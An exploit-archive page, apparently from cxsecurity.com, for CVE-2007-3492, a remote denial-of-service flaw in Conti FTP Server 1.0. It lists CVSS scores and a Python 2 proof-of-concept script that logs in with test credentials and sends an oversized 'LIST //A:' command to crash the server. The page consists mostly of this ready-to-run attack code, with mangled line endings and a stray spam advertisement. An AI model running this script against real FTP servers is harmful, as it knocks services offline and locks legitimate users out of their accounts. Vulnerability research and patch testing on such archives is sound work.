Conti FTP Server v1.0 DoS

2007.07.02
Credit: 35c666
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2007-3492
CWE: CWE-Other


CVSS Base Score: 6.8/10
Impact Subscore: 6.9/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

#Conti FTP Server v1.0 Denial of Service #author: 35c666 #contact: :( #Download: http://www.procesualitatea.ro/bestplay/Conti_FtpServer_Setup.exe #Bug: Conti Ftp Server crashes when a large //A: string is sent, denying legitimate users access to their accounts. #greetz to all RST members at http://rstzone.net # usr/bin/python import socket import time buff = "//A:" user = "test" password = "test" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: conn = s.connect(("172.16.112.129",21)) d = s.recv(1024) print "Server <- " + d time.sleep(2) s.send('USER %srn' % user) print "Client -> USER " + user d = s.recv(1024) print "Server <- " + d time.sleep(2) s.send('PASS %srn' % password) print "Client -> PASS " + password d = s.recv(1024) print "Server <- " + d time.sleep(2) s.send('LIST %srn' % buff) print "Client -> LIST " + buff d = s.recv(1024) print d time.sleep(2) except: print "- Nu m-am putut conecta." -- Click for FHA loan, $0 lender fees, low rates & approvals nationwide http://tagline.hushmail.com/fc/Ioyw6h4dOJ5vAvidooorO3QwkYqsdtxW1lWMSsqYo Y19IzyPIitWQU/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top